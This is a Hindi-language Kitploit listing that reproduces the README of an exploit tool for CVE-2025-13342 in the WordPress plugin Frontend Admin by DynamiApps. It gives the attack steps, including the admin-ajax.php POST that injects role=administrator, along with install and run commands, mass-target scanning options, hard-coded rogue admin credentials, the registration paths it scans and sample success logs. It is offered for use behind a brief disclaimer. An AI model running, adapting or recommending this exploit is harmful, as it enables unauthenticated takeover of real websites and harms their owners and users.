Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-13342 — Frontend Admin by DynamiApps <= 3.28.20 - बिना प्रमाणीकरण के मनमाने विकल्प अपडेट | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-13342
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubnxploited/cve-2025-13342

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - बिना प्रमाणीकरण के मनमाने विकल्प अपडेट

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - बिना प्रमाणीकरण के मनमाना विकल्प अपडेट

⚡ CVE-2025-13342

Frontend Admin by DynamiApps — बिना प्रमाणीकरण के एडमिन निर्माण

root@kitploit:~
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__

CVE CVSS Plugin Auth

Python

◈ भेद्यता

फ़ील्डविवरण
CVE IDCVE-2025-13342
स्कोर9.8 गंभीर (CRITICAL) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
प्रभावितFrontend Admin by DynamiApps ≤ 3.28.20
प्रमाणीकरणकोई नहीं — पूरी तरह से बिना प्रमाणीकरण
प्रकारअपर्याप्त क्षमता जाँच + इनपुट सत्यापन → मनमाना विकल्प लेखन
CWECWE-284 · अनुचित अभिगम नियंत्रण

क्या होता है:
ActionOptions::run() सेव हैंडलर wp_options में लिखने से पहले न तो उपयोगकर्ता क्षमताओं की जाँच करता है और न ही इनपुट को सत्यापित करता है। एक सार्वजनिक ACF फ्रंटएंड फॉर्म एक खुला लेखन चैनल बन जाता है। हमलावर users_can_register=1 और default_role=administrator सेट करता है, फिर एक नया खाता पंजीकृत करता है जिसे स्वचालित रूप से Administrator भूमिका प्राप्त होती है।

यह उपकरण उस दो-चरणीय दृष्टिकोण को छोड़ देता है — यह acff[user][field_*] के माध्यम से उपयोगकर्ता निर्माण फ़ील्ड्स में इंजेक्ट किए गए role=administrator के साथ तैयार किए गए फॉर्म पेलोड को सीधे सबमिट करता है, जिससे एक ही AJAX कॉल में एडमिन खाता बन जाता है।


◈ एक्सप्लॉइट कैसे काम करता है

root@kitploit:~
1. Crawl common registration paths  →  locate ACF frontend form
2. Parse hidden fields               →  _acf_nonce, _acf_form
3. Map user fields                   →  username · email · password · role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][<role_field>] = administrator
5. {"success":true}  →  admin account created
6. Log to acf_success.txt

◈ आवश्यकताएँ

root@kitploit:~
requests
beautifulsoup4
colorama
rich
root@kitploit:~
pip install requests beautifulsoup4 colorama rich

◈ स्थापना और चलाना

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py

◈ उपयोग

यह उपकरण इंटरैक्टिव है। आपसे चार प्रश्न पूछे जाएँगे:

root@kitploit:~
Targets file path    →  list.txt
Threads              →  10
Timeout (seconds)    →  10
Verbose debug        →  y / N

क्रेडेंशियल्स आंतरिक रूप से निर्धारित हैं:

फ़ील्डमान
उपयोगकर्ता नामNxadmin1
ईमेल[email protected]
पासवर्डNxAdmin_1337#KSA

◈ लक्ष्य फ़ाइल

प्रति पंक्ति एक होस्ट — योजना (scheme) वैकल्पिक:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

◈ स्कैन किए गए पंजीकरण पथ

यह उपकरण प्रति लक्ष्य क्रम से 28 पथों की जाँच करता है, पहले मान्य ACF फॉर्म पर रुकते हुए:

root@kitploit:~
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...

◈ आउटपुट

फ़ाइलसामग्री
acf_success.txtपुष्टि किए गए सफल एडमिन निर्माण

प्रारूप:

root@kitploit:~
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}

टर्मिनल:

root@kitploit:~
[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com

◈ संपर्क

लेखकNxploited (Khaled Alenazi)
GitHubgithub.com/Nxploited
Telegram@KNxploited

◈ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
लेखक स्वामी की स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध किसी भी उपयोग के लिए कोई ज़िम्मेदारी स्वीकार नहीं करता है।
अनधिकृत पहुँच CFAA, CMA और दुनिया भर के समकक्ष कानूनों के तहत अवैध है।
आप अपने कार्यों के लिए पूर्णतः स्वयं ज़िम्मेदार हैं।


© 2025 Nxploited · Frontend Admin by DynamiApps ≤ 3.28.20 · 3.28.21 में ठीक किया गया
टूल डाउनलोड करें